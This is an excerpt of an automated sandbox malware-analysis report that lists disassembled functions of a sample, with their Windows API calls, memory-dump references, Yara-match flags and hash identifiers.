                                                                                                      • Associated: 00000000.00000002.1887630778.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887668666.0000000001112000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887707800.0000000001118000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887744948.000000000111A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887786083.0000000001127000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887823253.0000000001129000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_e10000_SecuriteInfo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AttributesFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 3188754299-0
                                                                                                      • Opcode ID: e656c0bb28c2ce0cf6827633b6d4cc6b7dc349f95b9dabdc0bef8f35c0b2ad2d
                                                                                                      • Instruction ID: f3eb8215b2f5af96ca7d570ef762aa822721120a226176c733244297c099f1d3
                                                                                                      • Opcode Fuzzy Hash: e656c0bb28c2ce0cf6827633b6d4cc6b7dc349f95b9dabdc0bef8f35c0b2ad2d
                                                                                                      • Instruction Fuzzy Hash: 1AC0803401191047E91D4968524C0A53300BB4331C3E82F48D173660F1CA32C4C3C770
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00E1A9D0 Relevance: 1.5, APIs: 1, Instructions: 244COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • CoInitialize.OLE32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00E1ABF8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1885241101.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1885216427.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885241101.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885371883.0000000000E79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885410128.0000000000E7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885438373.0000000000E87000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886119092.0000000000FD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886156330.0000000000FD8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886197108.0000000000FED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886197108.0000000000FF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886289577.0000000001014000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886326423.0000000001016000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886355276.0000000001029000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886390792.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886430986.0000000001032000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886469194.000000000103D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886513828.0000000001052000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886550731.0000000001056000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886591341.000000000105E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886631945.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886671373.0000000001067000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886709527.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886752961.000000000107A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886888194.000000000107B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886933792.0000000001088000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887009956.000000000108D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887062815.000000000108E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887100518.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887139267.0000000001092000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887178042.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887222344.00000000010AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887259907.00000000010AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887296727.00000000010AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887336233.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887394735.00000000010D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887420470.00000000010D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887420470.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887514236.00000000010F9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887552899.00000000010FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887591736.000000000110F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887630778.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887668666.0000000001112000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887707800.0000000001118000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887744948.000000000111A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887786083.0000000001127000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887823253.0000000001129000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_e10000_SecuriteInfo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Initialize
                                                                                                      • String ID:
                                                                                                      • API String ID: 2538663250-0
                                                                                                      • Opcode ID: 777de22aed09a5672f6dd6778cbf52a673a847190cebb109af4240867699c623
                                                                                                      • Instruction ID: e5a2b5ad6e3598fed35b76ba8cadc3ebff97f1db78872d139136dd485cb79af6
                                                                                                      • Opcode Fuzzy Hash: 777de22aed09a5672f6dd6778cbf52a673a847190cebb109af4240867699c623
                                                                                                      • Instruction Fuzzy Hash: 1FB11670A11268DFEB28CF14C894BEEB7B5EF49304F5041D9E809A7281D775AAC8CF91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 05660C85 Relevance: .1, Instructions: 129COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1890835772.0000000005660000.00000040.00001000.00020000.00000000.sdmp, Offset: 05660000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_5660000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 8612945c60252dfa605f6cda545104d7741c92ec7acd92ac2ad39bae3029eb8b
                                                                                                      • Instruction ID: e0f93b1c3acd8f4ade734f1dd580373abe1ed79c3d360ef783770deca6471722
                                                                                                      • Opcode Fuzzy Hash: 8612945c60252dfa605f6cda545104d7741c92ec7acd92ac2ad39bae3029eb8b
                                                                                                      • Instruction Fuzzy Hash: 1C21E8EB14D120BD7142C6827F28EFB676EE5D2630331853BF407C5946E2985A4EA232
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 05660CA8 Relevance: .1, Instructions: 124COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1890835772.0000000005660000.00000040.00001000.00020000.00000000.sdmp, Offset: 05660000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_5660000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 3f62f871ca032a2b776c2e51ea69a2b5f7d811b183494404879084f74af6f5e6
                                                                                                      • Instruction ID: 08e25b359a899e1dabdbeae798dd5e2ca483680eabf36843a93fe6be9b32bdda
                                                                                                      • Opcode Fuzzy Hash: 3f62f871ca032a2b776c2e51ea69a2b5f7d811b183494404879084f74af6f5e6
                                                                                                      • Instruction Fuzzy Hash: C511DAFF25C1207D7142D5827F68AFB67AEE5D2630330C53BF803D1946E2991A4EA232
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 05660CCC Relevance: .1, Instructions: 115COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1890835772.0000000005660000.00000040.00001000.00020000.00000000.sdmp, Offset: 05660000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_5660000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 52c57ab0eae592d6291cc5e28782ebad6334625be22e5fae6ed76a3af72b672a
                                                                                                      • Instruction ID: f60ef53fc65fc2d4c568f33efc37d547b919ffccc5d8370a44d53501e0f9f7e2
                                                                                                      • Opcode Fuzzy Hash: 52c57ab0eae592d6291cc5e28782ebad6334625be22e5fae6ed76a3af72b672a
                                                                                                      • Instruction Fuzzy Hash: 1F11D6FF24C1207D7042C5827F28AFB676EE5D2630330C93BF807C4946E2981A4EA232
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 05660CE6 Relevance: .1, Instructions: 112COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1890835772.0000000005660000.00000040.00001000.00020000.00000000.sdmp, Offset: 05660000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_5660000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 4b0f8feb1e30458777f62b7ceb91c30c3065bbc34066565a92eb73436bc33ed9
                                                                                                      • Instruction ID: 255bc64a1e98a04a5d0e89fba4c20e65cad497e44bb89668a1354480432b533f
                                                                                                      • Opcode Fuzzy Hash: 4b0f8feb1e30458777f62b7ceb91c30c3065bbc34066565a92eb73436bc33ed9
                                                                                                      • Instruction Fuzzy Hash: 14113AEF15D1607D7142C6823B68AFA5B6EE4D3630334897BF803C4946E2991E4FA232
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 05660CFB Relevance: .1, Instructions: 102COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1890835772.0000000005660000.00000040.00001000.00020000.00000000.sdmp, Offset: 05660000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_5660000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 48cbd8f23e1171f316f8dfd4a62d3b763d4e918144d883c08d2722c892b05961
                                                                                                      • Instruction ID: 3433e7c5978c4f339348ddf5e3f4e1b7a9f97ca57e28ee3078d50e67c33da1bc
                                                                                                      • Opcode Fuzzy Hash: 48cbd8f23e1171f316f8dfd4a62d3b763d4e918144d883c08d2722c892b05961
                                                                                                      • Instruction Fuzzy Hash: 7911E8EF14D1207D7042C2827F29AFBA76EE5D2A30330893BF807D5546E2D91A4E6232
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 05660D38 Relevance: .1, Instructions: 95COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1890835772.0000000005660000.00000040.00001000.00020000.00000000.sdmp, Offset: 05660000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_5660000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 20ea74eae6027b4b2df5e35d1005fdcaf7e6628f830a00169494fe0f918bc4a4
                                                                                                      • Instruction ID: 40251d7f4f307549ba23d9e2da9aa00613950be287a4d708d13866ce35d4e9ca
                                                                                                      • Opcode Fuzzy Hash: 20ea74eae6027b4b2df5e35d1005fdcaf7e6628f830a00169494fe0f918bc4a4
                                                                                                      • Instruction Fuzzy Hash: B0111BEF24D160BD7142C2827F6CAFA6B2EE5D2A303308977F402D5942E2D51A4FA231
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 05660D51 Relevance: .1, Instructions: 63COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1890835772.0000000005660000.00000040.00001000.00020000.00000000.sdmp, Offset: 05660000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_5660000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: bd77fb4aa01c08917f38ec85a290543ecd2a7a94a0be59b993924e7bcf9fdaee
                                                                                                      • Instruction ID: 23e727c446009ae0c347686244f0e63d5ae31d9103157d628906b7b0cbaf687e
                                                                                                      • Opcode Fuzzy Hash: bd77fb4aa01c08917f38ec85a290543ecd2a7a94a0be59b993924e7bcf9fdaee
                                                                                                      • Instruction Fuzzy Hash: 7DF04FFF14C120BDB142C1927B58AFA6B2EE5D22303308577F403C5902E6D91A4FA231
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 05660D70 Relevance: .1, Instructions: 56COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1890835772.0000000005660000.00000040.00001000.00020000.00000000.sdmp, Offset: 05660000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_5660000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 9a911dbaa7f2137d4f1707f9a91fc874fd145ebe0645f23df93f727a6832e00c
                                                                                                      • Instruction ID: 861943e770d2697db3276445d9a137ef1ea037333663ce0aef2ed76f7da5b349
                                                                                                      • Opcode Fuzzy Hash: 9a911dbaa7f2137d4f1707f9a91fc874fd145ebe0645f23df93f727a6832e00c
                                                                                                      • Instruction Fuzzy Hash: A4F0FEEF18C120BD604281826F58AFB576EE5D26313319537F413D4506E6991A4EA631
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 05660D84 Relevance: .1, Instructions: 55COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1890835772.0000000005660000.00000040.00001000.00020000.00000000.sdmp, Offset: 05660000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_5660000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 01d726121f51c94e4604bcb55e0dbfbb8eac3af42a01762b35eaddc97811302d
                                                                                                      • Instruction ID: 77b5c121fc8e80e48c3475f0e529c73c827e3984e8c6dbe25cfd428319d06dc3
                                                                                                      • Opcode Fuzzy Hash: 01d726121f51c94e4604bcb55e0dbfbb8eac3af42a01762b35eaddc97811302d
                                                                                                      • Instruction Fuzzy Hash: 89F0F8EF198120BDA00281827F18BF7AB3EE6D2A313308537F403D4942A6C81A4EA631
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Non-executed Functions

                                                                                                      Function 00E1D8D0 Relevance: 4.6, APIs: 3, Instructions: 102networkCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • recv.WS2_32(?,?,00000004,00000000), ref: 00E1D91B
                                                                                                      • recv.WS2_32(?,?,00000008,00000000), ref: 00E1D950
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1885241101.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1885216427.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885241101.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885371883.0000000000E79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885410128.0000000000E7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885438373.0000000000E87000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886119092.0000000000FD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886156330.0000000000FD8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886197108.0000000000FED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886197108.0000000000FF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886289577.0000000001014000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886326423.0000000001016000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886355276.0000000001029000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886390792.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886430986.0000000001032000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886469194.000000000103D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886513828.0000000001052000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886550731.0000000001056000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886591341.000000000105E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886631945.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886671373.0000000001067000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886709527.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886752961.000000000107A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886888194.000000000107B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886933792.0000000001088000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887009956.000000000108D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887062815.000000000108E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887100518.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887139267.0000000001092000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887178042.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887222344.00000000010AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887259907.00000000010AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887296727.00000000010AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887336233.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887394735.00000000010D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887420470.00000000010D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887420470.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887514236.00000000010F9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887552899.00000000010FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887591736.000000000110F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887630778.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887668666.0000000001112000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887707800.0000000001118000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887744948.000000000111A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887786083.0000000001127000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887823253.0000000001129000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_e10000_SecuriteInfo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: recv
                                                                                                      • String ID:
                                                                                                      • API String ID: 1507349165-0
                                                                                                      • Opcode ID: 42e2d7f4068e20f35dcf92acbb99dcb0547a91665577c61052631198dd45c0cb
                                                                                                      • Instruction ID: 7bc73417c052d7a9a43f600863202394eea622a6ae9d58d6219b51500d2fd906
                                                                                                      • Opcode Fuzzy Hash: 42e2d7f4068e20f35dcf92acbb99dcb0547a91665577c61052631198dd45c0cb
                                                                                                      • Instruction Fuzzy Hash: A731F8719442185FD720CB6DDC89FEF77BCEB08728F041625E519F7291DA749889CBA0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00E2E27A Relevance: 1.5, APIs: 1, Instructions: 16timeCOMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetSystemTimePreciseAsFileTime.KERNEL32(?,00E2E5E2,?,00000003,00000003,?,00E2E617,?,?,?,00000003,00000003,?,00E2DB8D,00E12EB9,00000001), ref: 00E2E293
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1885241101.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1885216427.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885241101.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885371883.0000000000E79000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885410128.0000000000E7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1885438373.0000000000E87000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886119092.0000000000FD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886156330.0000000000FD8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886197108.0000000000FED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886197108.0000000000FF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886289577.0000000001014000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886326423.0000000001016000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886355276.0000000001029000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886390792.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886430986.0000000001032000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886469194.000000000103D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886513828.0000000001052000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886550731.0000000001056000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886591341.000000000105E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886631945.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886671373.0000000001067000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886709527.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886752961.000000000107A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886888194.000000000107B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1886933792.0000000001088000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887009956.000000000108D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887062815.000000000108E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887100518.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887139267.0000000001092000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887178042.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887222344.00000000010AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887259907.00000000010AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887296727.00000000010AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887336233.00000000010B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887394735.00000000010D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887420470.00000000010D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887420470.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887514236.00000000010F9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887552899.00000000010FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887591736.000000000110F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887630778.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1887668666.0000000001112000.00000080.00000001.01000000.00000003.sdmpDownload File
